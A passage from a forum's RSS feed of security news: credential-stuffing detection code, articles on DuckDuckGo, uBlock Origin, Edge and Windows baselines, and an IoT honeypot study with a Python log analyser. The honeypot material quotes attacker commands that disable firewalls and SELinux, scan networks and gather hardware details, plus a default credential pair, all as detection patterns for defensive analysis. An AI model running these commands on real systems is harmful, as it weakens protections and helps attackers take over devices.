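    ("2021-12-27T22:01:03Z", "alice@example.com", "203.0.113.7", "BR", "blocked"),
    ("2021-12-27T22:01:04Z", "bob@example.com", "203.0.113.7", "BR", "blocked"),
    ("2021-12-27T22:01:04Z", "carol@example.com", "203.0.113.7", "BR", "blocked"),
    ("2021-12-27T22:01:05Z", "dave@example.com", "203.0.113.7", "BR", "blocked"),
    ("2021-12-27T22:01:06Z", "erin@example.com", "203.0.113.7", "BR", "blocked"),
    ("2021-12-27T22:01:07Z", "frank@example.com", "203.0.113.7", "BR", "blocked"),
    ("2021-12-27T22:05:00Z", "bob@example.com", "198.51.100.20", "US", "success"),
    ("2021-12-27T22:09:41Z", "carol@example.com", "198.51.100.33", "DE", "success"),
]

# Countries each account has previously logged in from (constructed; a real
# system would keep this per account from its own login history).
KNOWN_COUNTRIES = {
    "bob@example.com": {"US"},
    "carol@example.com": {"US"},
}


def detect_credential_stuffing(events, min_accounts=5, max_success_ratio=0.2):
    """Flag source IPs that try many distinct accounts with few or no successes.

    One source, many accounts, mostly blocked is the shape of credential
    stuffing: replaying email/password pairs harvested from other breaches.
    Thresholds are assumptions for the example.
    Returns {ip: {"accounts": n, "attempts": n, "successes": n}}.
    """
    by_ip = defaultdict(list)
    for _ts, account, ip, _country, outcome in events:
        by_ip[ip].append((account, outcome))

    findings = {}
    for ip, attempts in by_ip.items():
        accounts = {account for account, _ in attempts}
        successes = sum(1 for _, outcome in attempts if outcome == "success")
        if len(accounts) >= min_accounts and successes / len(attempts) <= max_success_ratio:
            findings[ip] = {
                "accounts": len(accounts),
                "attempts": len(attempts),
                "successes": successes,
            }
    return findings


def user_alerts(events, known_countries):
    """Decide which events deserve an email to the account owner.

    Only a successful login from a country the account has not used before is
    worth interrupting a user for; blocked bot attempts belong in the
    defender's queue, not in the user's inbox.
    Returns a list of (account, ip, country, timestamp).
    """
    alerts = []
    for ts, account, ip, country, outcome in events:
        if outcome == "success" and country not in known_countries.get(account, set()):
            alerts.append((account, ip, country, ts))
    return alerts


def noisy_alerts(events, findings):
    """Count the emails a naive rule ("notify on every blocked attempt") would
    have sent for traffic already attributed to a stuffing source."""
    return sum(1 for _ts, _a, ip, _c, outcome in events
               if ip in findings and outcome == "blocked")


if __name__ == "__main__":
    found = detect_credential_stuffing(EVENTS)
    print("credential-stuffing sources:", found)
    print("user-facing alerts:", user_alerts(EVENTS, KNOWN_COUNTRIES))
    print("alerts a naive rule would have sent:", noisy_alerts(EVENTS, found))
```

			<p>
				Run it directly to see the three outputs. The minimum-accounts threshold is what keeps a single user mistyping a password from a new network out of the stuffing bucket, and the success-ratio cap keeps a source that is mostly succeeding (a shared corporate egress, for instance) from being flagged.
			</p>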

			<p>
				 
			</p>

			<p id="qcsjGI">
				<strong>Update December 29th, 12:20AM ET</strong>: Added new statement from LastPass
			</p>
		</div>
	</div>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.theverge.com/2021/12/28/22857485/lastpass-compromised-breach-scare" rel="external nofollow">LastPass says no passwords were compromised following breach scare</a>
</p>
]]></description><guid isPermaLink="false">3728</guid><pubDate>Wed, 29 Dec 2021 07:00:42 +0000</pubDate></item><item><title>Privacy-focused search engine DuckDuckGo grew by 46% in 2021</title><link>https://nsaneforums.com/news/security-privacy-news/privacy-focused-search-engine-duckduckgo-grew-by-46-in-2021-r3718/</link><description><![CDATA[<p>
	The privacy-focused search engine DuckDuckGo continues to grow rapidly, with the company now averaging over 100 million daily search queries and growing by almost 47% in 2021.
</p>

<p>
	 
</p>

<p>
	Unlike other search engines, <a href="https://duckduckgo.com/" rel="external nofollow" target="_blank">DuckDuckGo</a> says they do not track your searches or your behavior on other sites. Instead of building user profiles used to display interest-based ads, DuckDuckGo search pages display contextual advertisements based on the searched keywords.
</p>

<p>
	 
</p>

<p>
	This means that if you search on DuckDuckGo for a television, that search query will not be used to display television ads at every other site you visit.
</p>

<p>
	 
</p>

<p>
	Furthermore, to build its search index, the search engine uses the <a href="https://help.duckduckgo.com/duckduckgo-help-pages/results/duckduckbot/" rel="external nofollow" target="_blank">DuckDuckBot</a> spider to crawl sites and receives data from partners such as Wikipedia and Bing. However, it does not build its index using data from Google.
</p>

<h2>
	DuckDuckGo shows rapid growth
</h2>

<p>
	While Google remains the dominant search platform, DuckDuckGo has seen impressive year-over-year growth.
</p>

<p>
	 
</p>

<p>
	In 2020, DuckDuckGo received 23.6 billion total search queries and achieved a daily average of 79 million search queries by the end of December.
</p>

<p>
	 
</p>

<p>
	In 2021, DuckDuckGo received 34.6 billion total search queries so far and currently has an average of 100 million search queries per day, showing a 46.4% growth for the year.
</p>

<p>
	 
</p>

<p>
	<img alt="duckduckgo-traffic-growth-chart.jpg" class="ipsImage" data-ratio="75.10" height="428" width="720" src="https://www.bleepstatic.com/images/news/technology/d/duckduckgo/duckduckgo-traffic-growth-chart.jpg">
</p>

<div>
	<figure>
		<figcaption>
			DuckDuckGo traffic growth since 2010
		</figcaption>
	</figure>
</div>

<p>
	While DuckDuckGo's growth is considerable, it still only has 2.53% of the <a href="https://gs.statcounter.com/search-engine-market-share/all/united-states-of-america" rel="external nofollow" target="_blank">total market share</a>, with Yahoo at 3.3%, Bing at 6.43%, and Google holding a dominant share of 87.33% of search engine traffic in the USA.
</p>

<p>
	 
</p>

<p>
	However, as people continue to become frustrated with how their data is being used by tech giants like Google, Facebook, Microsoft, and Apple, we will likely see more people switch to privacy-focused search engines.
</p>

<p>
	 
</p>

<p>
	To further help users protect their privacy, DuckDuckGo released an email forwarding service in 2021 called '<a href="https://spreadprivacy.com/introducing-email-protection-beta/" rel="external nofollow" target="_blank">Email Protection</a>' that strips email trackers and allows you to protect your actual email address.
</p>

<p>
	 
</p>

<p>
	They also introduced '<a href="https://www.spreadprivacy.com/introducing-email-protection-beta/" rel="external nofollow" target="_blank">App Tracking Protection for Android</a>,' which blocks third-party trackers from Google and Facebook found in apps.
</p>

<p>
	 
</p>

<p>
	More recently, DuckDuckGo announced they are releasing a DuckDuckGo Privacy Browser for Desktop that will not be based on Chromium and will be built from scratch.
</p>

<p>
	 
</p>

<p>
	"No complicated settings, no misleading warnings, no "levels" of privacy protection – just robust privacy protection that works by default, across search, browsing, email, and more," explains a recent <a href="https://spreadprivacy.com/duckduckgo-2021-review/" rel="external nofollow" target="_blank">blog post</a> about the new browser.
</p>

<p>
	 
</p>

<p>
	"It's not a "privacy browser"; it's an everyday browsing app that respects your privacy because there's never a bad time to stop companies from spying on your search and browsing history."
</p>

<p>
	 
</p>

<p>
	For those looking to take back control of their data and add more privacy to their search behavior, DuckDuckGo may be the search engine for you.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/technology/privacy-focused-search-engine-duckduckgo-grew-by-46-percent-in-2021/" rel="external nofollow">Privacy-focused search engine DuckDuckGo grew by 46% in 2021</a>
</p>
]]></description><guid isPermaLink="false">3718</guid><pubDate>Sun, 26 Dec 2021 21:11:24 +0000</pubDate></item><item><title>uBlock Origin 1.40 Update introduces a workaround to block YouTube ads that were loaded at Chrome startup</title><link>https://nsaneforums.com/news/security-privacy-news/ublock-origin-140-update-introduces-a-workaround-to-block-youtube-ads-that-were-loaded-at-chrome-startup-r3710/</link><description><![CDATA[<p>
	Recently, some users chimed in about a similar problem with uBlock Origin in Chrome. The open-source ad blocker let some YouTube ads through in Google's browser. But this didn't happen all the time, only in specific scenarios, like when leaving a YouTube tab as the last active tab, and closing the browser. Upon reopening Chrome, the ads came through.
</p>

<p>
	 
</p>

<p>
	<img alt="uBlock-Origin-1.4-Update-introduces-a-wo" class="ipsImage" data-ratio="75.10" height="387" width="720" src="https://www.ghacks.net/wp-content/uploads/2021/12/uBlock-Origin-1.4-Update-introduces-a-workaround-to-block-YouTube-ads-in-Chrome.webp">
</p>

<p>
	 
</p>

<p>
	A member of uBlock Origin's team who was investigating the issue proposed a change to make tabs reload once the ad blocker is ready to filter web requests. That could be a potential solution for stopping the ads before they are delivered. But Raymond Hill (gorhill), the creator of the add-on, <a data-wpel-link="external" href="https://old.reddit.com/r/uBlockOrigin/comments/rmtmz0/ublock_origin_140_announcement_thread/" rel="external nofollow" target="_blank">said</a> that making tabs reload unconditionally would be a bad idea, especially if the user has hundreds of tabs; if all of them reloaded simultaneously, the result would be chaos.
</p>

<h3>
	uBlock Origin 1.40 Update prevents YouTube ads from loading when Chrome starts
</h3>

<p>
	Hill suggested that the extension should only reload a tab if that tab has already made a network request. The developers worked with this in mind and introduced a <a data-wpel-link="external" href="https://github.com/gorhill/uBlock/commit/a0a9497b4aca86727b314d8fc31ad345dad08ac8" rel="external nofollow" target="_blank">commit</a> in the add-on's repository that enables a previously experimental setting, suspendTabsUntilReady. The new version of the add-on, uBlock Origin 1.40, brings the fix for the YouTube ads at Chrome startup.
</p>

<p>
	 
</p>

<p>
	With the change, uBlock Origin will reload active tabs when Chrome is launched, while ignoring tabs that were inactive/suspended. The update also includes a couple of other improvements to the My Filters editor's auto-complete functionality, scriptlets, defusers, and the issue reporter. Pop-up filtering now supports a new scriptlet, window-close-if. The update is not yet live on the Chrome <a data-wpel-link="external" href="https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm?hl=en" rel="external nofollow" target="_blank">webstore</a>, <a data-wpel-link="external" href="https://addons.opera.com/en/extensions/details/ublock/" rel="external nofollow" target="_blank">Opera Addons store</a> and <a data-wpel-link="external" href="https://microsoftedge.microsoft.com/addons/detail/ublock-origin/odfafepnkmbhccpbejgmiehpchacaeak" rel="external nofollow" target="_blank">Microsoft Store</a>, but is already available on <a data-wpel-link="external" href="https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/" rel="external nofollow" target="_blank">Firefox's AMO</a>.
</p>

<p>
	 
</p>

<p>
	This YouTube ad issue isn't new per se. A few months ago, Opera browser's default ad blocker had the same problem. After reading user reports, I observed the same pattern when I tested the browser. It was generally agreed by the tech community that YouTube was changing the way ads were delivered, as a counter-active measure to prevent ad blockers from throttling ads. The issue was patched in a later version of Opera.
</p>

<p>
	 
</p>

<p>
	Google will stop supporting Manifest V2 extensions in 2023, forcing developers to shift to Manifest V3, which lacks the blocking webRequest API. But the search giant is already messing with ad blocking. When support for V2 ends, it will effectively break the functionality of ad blockers, including uBlock Origin for Chrome. Many users are <a data-wpel-link="external" href="https://github.com/uBlockOrigin/uBlock-issues/issues/338" rel="external nofollow" target="_blank">worried</a> about it, and are hoping the extension will somehow work in the browser after the dreaded change is forced upon developers. Can you blame them for being concerned? <a data-wpel-link="external" href="https://www.eff.org/deeplinks/2021/12/googles-manifest-v3-still-hurts-privacy-security-innovation" rel="external nofollow" target="_blank">Here's</a> an interesting article by the EFF that goes into the technical details of Manifest V3.
</p>

<p>
	 
</p>

<p>
	Fortunately, there are alternatives that you may want to consider switching to. Vivaldi and Brave have confirmed they will not implement V3 in their browsers, and Mozilla will implement its own version of Manifest V2 with the ability to perform cross-origin requests and will continue supporting V2 for a year after it has been deprecated. As for Microsoft Edge, I recommend reading about <a data-wpel-link="internal" href="https://www.ghacks.net/2021/12/13/microsoft-edge-criticized-for-anti-competitive-practices/" rel="external nofollow" target="_blank">recent issues</a> circling the browser before deciding if you should switch to it.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2021/12/24/ublock-origin-1-40-update-introduces-a-workaround-to-block-youtube-ads-in-chrome/" rel="external nofollow">uBlock Origin 1.40 Update introduces a workaround to block YouTube ads that were loaded at Chrome startup</a>
</p>
]]></description><guid isPermaLink="false">3710</guid><pubDate>Fri, 24 Dec 2021 21:16:44 +0000</pubDate></item><item><title>Honeypot experiment reveals what hackers want from IoT devices</title><link>https://nsaneforums.com/news/security-privacy-news/honeypot-experiment-reveals-what-hackers-want-from-iot-devices-r3701/</link><description><![CDATA[<p>
	A three-year-long honeypot experiment featuring simulated low-interaction IoT devices of various types and locations gives a clear idea of why actors target specific devices.
</p>

<p>
	 
</p>

<p>
	More specifically, the honeypot was meant to create a sufficiently diverse ecosystem and cluster the generated data in a way that determines the goals of adversaries.
</p>

<p>
	 
</p>

<p>
	IoT (Internet of Things) devices are a booming market that includes small internet-connected devices such as cameras, lights, doorbells, smart TVs, motion sensors, speakers, thermostats, and many more.
</p>

<p>
	 
</p>

<p>
	It is estimated that by 2025, over 40 billion of these devices will be connected to the Internet, providing network entry points or computational resources that can be used in unauthorized crypto mining or as part of DDoS swarms.
</p>

<h2>
	Setting the stage
</h2>

<p>
	The three components of the honeypot ecosystem set up by researchers at NIST and the University of Florida were server farms, a vetting system, and the data capturing and analysis infrastructure.
</p>

<p>
	 
</p>

<p>
	To create a diverse ecosystem, the researchers installed Cowrie, Dionaea, KFSensor, and HoneyCamera, which are off-the-shelf IoT honeypot emulators.
</p>

<p>
	 
</p>

<p>
	The researchers configured their instances to appear as real devices on Censys and Shodan, two specialized search engines that find internet-connected services.
</p>

<p>
	 
</p>

<p>
	The three main types of honeypots were the following:
</p>

<p>
	 
</p>

<ul>
	<li>
		HoneyShell – Emulating BusyBox
	</li>
	<li>
		HoneyWindowsBox – Emulating IoT devices running Windows
	</li>
	<li>
		HoneyCamera – Emulating various IP cameras from Hikvision, D-Link, and other devices.
	</li>
</ul>

<p>
	 
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="honeypot_setting.jpg" class="ipsImage" data-ratio="48.75" height="236" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/honeypot_setting.jpg">
		</p>

		<figcaption>
			Experiment layout<br>
			Source: Arxiv.org
		</figcaption>
	</figure>
</div>

<p>
	A novel element in this experiment is that the honeypots were adjusted to respond to attacker traffic and attack methods. 
</p>

<p>
	 
</p>

<p>
	The researchers used the collected data to change the IoT configuration and defenses and then gather new data that reflected the actor's response to these changes.
</p>

<h2>
	The findings
</h2>

<p>
	The experiment produced data from a massive 22.6 million hits, with the vast majority targeting the HoneyShell honeypot.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="hits.jpg" class="ipsImage" data-ratio="27.94" height="159" width="569" src="https://www.bleepstatic.com/images/news/u/1220909/Tables/hits.jpg">
		</p>

		<figcaption>
			Number of hits for each honeypot type<br>
			Source: Arxiv.org
		</figcaption>
	</figure>
</div>

<p>
	The various actors exhibited similar attack patterns, likely because their objectives and the means to achieve them were common.
</p>

<p>
	 
</p>

<p>
	For example, most actors run commands such as "masscan" to scan for open ports and "/etc/init.d/iptables stop" to disable firewalls.
</p>

<p>
	 
</p>

<p>
	Additionally, many actors run "free -m", "lspci | grep VGA", and "cat /proc/cpuinfo", all three aiming to collect hardware information about the target device.
</p>

<p>
	 
</p>

<p>
	Interestingly, almost a million hits tested the "admin / 1234" username-password combination, reflecting how widely that default credential pair is used on IoT devices.
</p>

<p>
	 
</p>

<p>
	As for end goals, the researchers found that the HoneyShell and the HoneyCamera honeypots were targeted mainly for DDoS recruitment and were often also infected with a Mirai variant or a coin miner.
</p>

<p>
	 
</p>

<p>
	Coin miner infections were the most common observation on the Windows honeypot, followed by viruses, droppers, and trojans.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="types.jpg" class="ipsImage" data-ratio="62.43" height="324" width="519" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/types.jpg">
		</p>

		<figcaption>
			Attack types targeting HoneyWindowsBox<br>
			Source: Arxiv.org
		</figcaption>
	</figure>
</div>

<p>
	In the case of the HoneyCamera, the researchers intentionally crafted a vulnerability to reveal credentials and noticed that 29 actors engaged in exploiting the flaw manually.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="camera.jpg" class="ipsImage" data-ratio="62.50" height="365" width="584" src="https://www.bleepstatic.com/images/news/u/1220909/Security/camera.jpg">
		</p>

		<figcaption>
			HoneyCamera layout<br>
			Source: Arxiv.org
		</figcaption>
	</figure>
</div>

<p>
	"Only 314 112 (13 %) unique sessions were detected with at least one successful command execution inside the honeypots," explains the <a href="https://arxiv.org/pdf/2112.10974.pdf" rel="external nofollow" target="_blank">research paper</a>.
</p>

<p>
	 
</p>

<p>
	"This result indicates that only a small portion of the attacks executed their next step, and the rest (87 %) solely tried to find the correct username/password combination."
</p>
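<p>
	The commands quoted above ("masscan", "/etc/init.d/iptables stop", "free -m", "lspci | grep VGA", "cat /proc/cpuinfo"), the "admin / 1234" credential pair and the 13 % sessions-with-a-command figure are all things an analyst can compute from honeypot logs. The following Python is an added example and not the researchers' tooling: it parses constructed Cowrie-style JSON lines (Cowrie is one of the honeypots the experiment used; the event names follow its log format, while the sessions, addresses, credentials and commands are invented), tallies the credential pairs tried, labels each executed command with a tactic, and computes the fraction of sessions that got past the login stage. The tactic table and its extra markers (nmap, ufw disable and so on) are assumptions for the example.
</p>

```python
import json
from collections import Counter

# Constructed Cowrie-style JSON log lines (not data from the paper). The
# event names follow Cowrie's JSON output; sessions, IPs, credentials and
# commands are invented for illustration.
SAMPLE_LOG = """
{"eventid": "cowrie.session.connect", "session": "s1", "src_ip": "198.51.100.10"}
{"eventid": "cowrie.login.failed", "session": "s1", "username": "admin", "password": "1234"}
{"eventid": "cowrie.login.failed", "session": "s1", "username": "root", "password": "root"}
{"eventid": "cowrie.session.closed", "session": "s1"}
{"eventid": "cowrie.session.connect", "session": "s2", "src_ip": "203.0.113.5"}
{"eventid": "cowrie.login.success", "session": "s2", "username": "admin", "password": "1234"}
{"eventid": "cowrie.command.input", "session": "s2", "input": "/etc/init.d/iptables stop"}
{"eventid": "cowrie.command.input", "session": "s2", "input": "cat /proc/cpuinfo"}
{"eventid": "cowrie.command.input", "session": "s2", "input": "lspci | grep VGA"}
{"eventid": "cowrie.command.input", "session": "s2", "input": "masscan -p22 10.0.0.0/8"}
{"eventid": "cowrie.session.closed", "session": "s2"}
{"eventid": "cowrie.session.connect", "session": "s3", "src_ip": "198.51.100.77"}
{"eventid": "cowrie.login.failed", "session": "s3", "username": "admin", "password": "1234"}
{"eventid": "cowrie.session.closed", "session": "s3"}
"""

# Substring markers for the behaviours the article describes, plus a few
# close relatives an analyst would group with them (assumed, not from the paper).
COMMAND_TACTICS = (
    ("scanning", ("masscan", "nmap", "zmap")),
    ("defense_evasion", ("iptables stop", "ufw disable", "setenforce 0")),
    ("hardware_recon", ("free -m", "lspci", "/proc/cpuinfo", "nproc")),
)


def tactic_for(command):
    """Map one shell command to a tactic label, or 'other' if nothing matches."""
    for tactic, markers in COMMAND_TACTICS:
        if any(marker in command for marker in markers):
            return tactic
    return "other"


def parse_log(text):
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyse(events):
    """Summarise sessions seen, credentials tried and post-login tactics."""
    sessions = set()
    sessions_with_commands = set()
    credentials = Counter()
    tactics = Counter()

    for ev in events:
        sid = ev["session"]
        sessions.add(sid)
        kind = ev["eventid"]
        if kind in ("cowrie.login.failed", "cowrie.login.success"):
            credentials[(ev["username"], ev["password"])] += 1
        elif kind == "cowrie.command.input":
            # A command input means the attacker got past authentication.
            sessions_with_commands.add(sid)
            tactics[tactic_for(ev["input"])] += 1

    return {
        "sessions": len(sessions),
        "sessions_with_commands": len(sessions_with_commands),
        "fraction_with_commands": len(sessions_with_commands) / len(sessions) if sessions else 0.0,
        "top_credentials": credentials.most_common(3),
        "tactics": dict(tactics),
    }


if __name__ == "__main__":
    summary = analyse(parse_log(SAMPLE_LOG))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

<p>
	On the sample, one of three sessions executes commands, which is the same "most hits never get past the password guess" picture the paper reports at scale. Substring matching is enough for the handful of commands the article names; on a real feed the "other" bucket is where new tooling shows up and is worth reviewing by hand.
</p>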

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/honeypot-experiment-reveals-what-hackers-want-from-iot-devices/" rel="external nofollow">Honeypot experiment reveals what hackers want from IoT devices</a>
</p>
]]></description><guid isPermaLink="false">3701</guid><pubDate>Thu, 23 Dec 2021 04:07:53 +0000</pubDate></item><item><title>Microsoft Edge may be sending search results to Microsoft! Here is how you turn that off</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-edge-may-be-sending-search-results-to-microsoft-here-is-how-you-turn-that-off-r3691/</link><description><![CDATA[<p>
	Microsoft Edge may send search results from any search that is run in the browser to Microsoft by default. The feature is not limited to Bing Search, it will inform Microsoft about searches on all search engines, including Google, DuckDuckGo, or StartPage, that users of Edge make, if the setting is enabled.
</p>

<p>
	 
</p>

<p>
	<img alt="microsoft-edge-search-data-collection.we" class="ipsImage" data-ratio="75.10" height="533" width="720" src="https://www.ghacks.net/wp-content/uploads/2021/12/microsoft-edge-search-data-collection.webp">
</p>

<p>
	 
</p>

<p>
	If you are using Microsoft Edge, either as the main browser on the system, as a secondary browser, or only when it is open as the default browser for certain links on the system, then you may want to check the settings of the browser to find out if search data is being sent to Microsoft.
</p>

<p>
	 
</p>

<p>
	When I opened Microsoft Edge today, a popup titled Assistance from Microsoft Edge appeared shortly after start. It told me that I could help Microsoft make search better and that Microsoft "will collect results from searches that you perform in the browser to improve Microsoft products and services". The data that is collected by Microsoft is "never associated" with the user or the device, Microsoft added reassuringly.
</p>

<p>
	 
</p>

<p>
	<img alt="edge-make-search-better.webp" class="ipsImage" data-ratio="85.44" height="540" width="499" src="https://www.ghacks.net/wp-content/uploads/2021/12/edge-make-search-better.webp">
</p>

<p>
	 
</p>

<p>
	A quick check of the setting revealed that Microsoft Edge had turned it on; it had been turned off previously. The setting in question is called "Help improve Microsoft products by sending the results from searches on the web", and you find it in the privacy section.
</p>

<p>
	 
</p>

<h3>
	How to check if Microsoft Edge is sending search data to Microsoft
</h3>

<p>
	 
</p>

<ol>
	<li>
		Load edge://settings/privacy#searchServiceImprovement in the Microsoft Edge web browser; this should load the relevant setting right away. Microsoft's prompt has a "manage setting" button, but it does not reveal the name of the setting and you are taken to the top of the privacy and security settings page of Edge.
	</li>
	<li>
		Toggle "Help improve Microsoft products by sending the results from searches on the web" to off to disable it (under Search and service improvement).
	</li>
</ol>

<p>
	 
</p>

<p>
	A <a data-wpel-link="external" href="https://support.microsoft.com/en-us/topic/learn-more-about-search-and-service-improvements-in-microsoft-edge-5b95a197-6311-4976-ad33-4aad57a9ce65" rel="external nofollow" target="_blank">support page</a> on the Microsoft website explains what Microsoft is collecting and how it uses the data.
</p>

<p>
	 
</p>

<p>
	Microsoft may collect:
</p>

<p>
	 
</p>

<ul>
	<li>
		the search term
	</li>
	<li>
		the search results that are displayed.
	</li>
	<li>
		the interaction with the search results, including links that are clicked on.
	</li>
	<li>
		demographic data.
	</li>
</ul>

<p>
	 
</p>

<p>
	Other data may be collected, but the four items above are listed explicitly by Microsoft. All the data is collected to improve the user experience in Edge, Bing, Microsoft News and other company services, according to Microsoft.
</p>

<p>
	 
</p>

<p>
	Microsoft claims that it scrubs and de-identifies data by "removing data identifying the person or device from which it was collected", that it does not use the data to "personalize or provide ads", that it never associates the data with an account or device, and that the feature is not available on managed devices.
</p>

<h3>
	Closing Words
</h3>

<p>
	Microsoft, like many other browser makers, is making changes to its browser's settings that many users would object to if asked clearly. The change is made automatically, and users must take action to disable it, provided that they fully understand the implications of having the feature enabled.
</p>

<p>
	 
</p>

<p>
	The popup text is worded cleverly, who would not want better search results?
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2021/12/22/microsoft-edge-send-search-results/" rel="external nofollow">Microsoft Edge may be sending search results to Microsoft! Here is how you turn that off</a>
</p>
]]></description><guid isPermaLink="false">3691</guid><pubDate>Wed, 22 Dec 2021 06:25:50 +0000</pubDate></item><item><title>Windows 10 21H2 adds ransomware protection to security baseline</title><link>https://nsaneforums.com/news/security-privacy-news/windows-10-21h2-adds-ransomware-protection-to-security-baseline-r3687/</link><description><![CDATA[<p>
	Microsoft has released the final version of security configuration baseline settings for Windows 10, version 21H2, available today from the Microsoft Security Compliance Toolkit.
</p>

<p>
	 
</p>

<p>
	"This Windows 10 feature update brings very few new policy settings," Microsoft security consultant Rick Munck said.
</p>

<p>
	 
</p>

<p>
	"One setting has been added for this release for printer driver installation restrictions (which was also added to the Windows 11 release). Additionally, all Microsoft Edge Legacy settings have been removed."
</p>

<h2>
	Protection from human-operated ransomware
</h2>

<p>
	However, the highlight of the new Windows 10 security baseline is the addition of <a href="https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide" rel="external nofollow" target="_blank">tamper protection</a> as a setting to enable by default (this was also made a <a href="https://www.bleepingcomputer.com/news/security/microsoft-adds-tamper-protection-to-windows-11-security-baseline/" target="_blank" rel="external nofollow">default setting in the Windows 11 security baseline</a> two months ago).
</p>

<p>
	 
</p>

<p>
	When applying the Microsoft Security Baseline for Windows 10 21H2, Redmond urges admins to turn on Defender for Endpoint's <a href="https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide" rel="external nofollow" target="_blank">tamper protection</a> feature to protect against human-operated ransomware attacks.
</p>

<p>
	 
</p>

<p>
	This feature does that by blocking attempts by ransomware operators or malware to disable OS security features and security solutions to gain easier access to sensitive data and deploy further malware or malicious tools.
</p>

<p>
	 
</p>

<p>
	Tamper protection automatically locks Microsoft Defender Antivirus using the default secure values, thwarting attempts to change them using the registry, PowerShell cmdlets, or group policies.
</p>

<p>
	 
</p>

<p>
	After enabling it, ransomware operators would have a considerably more challenging task when trying to:
</p>

<p>
	 
</p>

<ul>
	<li>
		Disable virus and threat protection
	</li>
	<li>
		Disable real-time protection
	</li>
	<li>
		Turn off behavior monitoring
	</li>
	<li>
		Disable antivirus (such as IOfficeAntivirus (IOAV))
	</li>
	<li>
		Disable cloud-delivered protection
	</li>
	<li>
		Remove security intelligence updates
	</li>
	<li>
		Disable automatic actions on detected threats
	</li>
</ul>

<h2>
	PrintNightmare and Edge Legacy
</h2>

<p>
	With the new Windows 10 21H2 security baseline, Redmond removed all Microsoft Edge Legacy settings after its EdgeHTML-based web browser reached end of support in March.
</p>

<p>
	 
</p>

<p>
	"Going forward, please use the new Microsoft Edge (Chromium-based) baseline, which is on a separate release cadence and available as part of the Microsoft Security Compliance Toolkit," Munck added.
</p>

<p>
	 
</p>

<p>
	Microsoft also added a new setting to the MS Security Guide custom administrative template designed to restrict printer driver installation to users with Administrator privileges.
</p>

<p>
	 
</p>

<p>
	The new recommendation follows security updates released starting with July 2021 to address the CVE-2021-34527 <a href="https://www.bleepingcomputer.com/tag/printnightmare/" target="_blank" rel="external nofollow">PrintNightmare</a> remote code execution flaw impacting the Windows Print Spooler service.
</p>

<h2>
	Now available for download
</h2>

<p>
	<a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-configuration-framework/windows-security-baselines" rel="external nofollow" target="_blank">Windows security baselines</a> provide Microsoft-recommended security configurations which reduce Windows systems' attack surface and increase the overall security posture of enterprise endpoints.
</p>

<p>
	 
</p>

<p>
	"A security baseline is a group of Microsoft-recommended configuration settings that explains their security impact," as Microsoft <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-configuration-framework/windows-security-baselines" rel="external nofollow" target="_blank">explains</a>. "These settings are based on feedback from Microsoft security engineering teams, product groups, partners, and customers."
</p>

<p>
	 
</p>

<p>
	The Windows 10 21H2 security baseline is now available for download via the <a href="https://www.microsoft.com/download/details.aspx?id=55319" rel="external nofollow" target="_blank">Microsoft Security Compliance Toolkit</a>, and it includes Group Policy Object (GPO) backups and reports, the scripts needed to apply settings to the local GPO, as well as Policy Analyzer rules.
</p>

<p>
	 
</p>

<p>
	"Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and customize / implement as appropriate," Munck added.
</p>

<p>
	 
</p>

<p>
	More info on the changes that the new Windows 10 21H2 security baseline comes with is available in this <a href="https://techcommunity.microsoft.com/t5/microsoft-security-baselines/security-baseline-for-windows-10-version-21h2/ba-p/3042703" rel="external nofollow" target="_blank">Microsoft Security Baselines blog post</a>.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/windows-10-21h2-adds-ransomware-protection-to-security-baseline/" rel="external nofollow">Windows 10 21H2 adds ransomware protection to security baseline</a>
</p>
]]></description><guid isPermaLink="false">3687</guid><pubDate>Tue, 21 Dec 2021 21:57:13 +0000</pubDate></item><item><title>Western Digital warns customers to update their My Cloud devices</title><link>https://nsaneforums.com/news/security-privacy-news/western-digital-warns-customers-to-update-their-my-cloud-devices-r3672/</link><description><![CDATA[<p>
	Western Digital is urging customers to update their WD My Cloud devices to the latest available firmware so that they keep receiving security updates, as older My Cloud OS firmware is reaching the end of support.
</p>

<p>
	 
</p>

<p>
	"On April 15, 2022, support for prior generations of My Cloud OS, including My Cloud OS 3, will end," the company <a href="https://www.westerndigital.com/support/product-security/wdc-21015-important-security-updates-for-your-my-cloud-device" rel="external nofollow" target="_blank">said</a> this week.
</p>

<p>
	 
</p>

<p>
	"If your device isn't compatible with My Cloud OS 5, you will lose remote access and will only be able to access it locally. Devices on these older firmware versions will not receive security fixes or technical support."
</p>

<p>
	 
</p>

<p>
	Western Digital advises customers to protect their data from attackers once the firmware is no longer supported by backing up their devices, <a href="https://support-en.wd.com/app/answers/detail/a_id/29502" rel="external nofollow" target="_blank">disabling remote access</a>, disconnecting them from the internet, and choosing a unique and strong password.
</p>

<p>
	 
</p>

<p>
	Those who have eligible devices can <a href="https://support-en.wd.com/app/answers/detail/a_id/29813" rel="external nofollow" target="_blank">update them</a> to My Cloud OS 5 (which will be supported at least until the end of 2026) before the end of support date.
</p>

<p>
	 
</p>

<p>
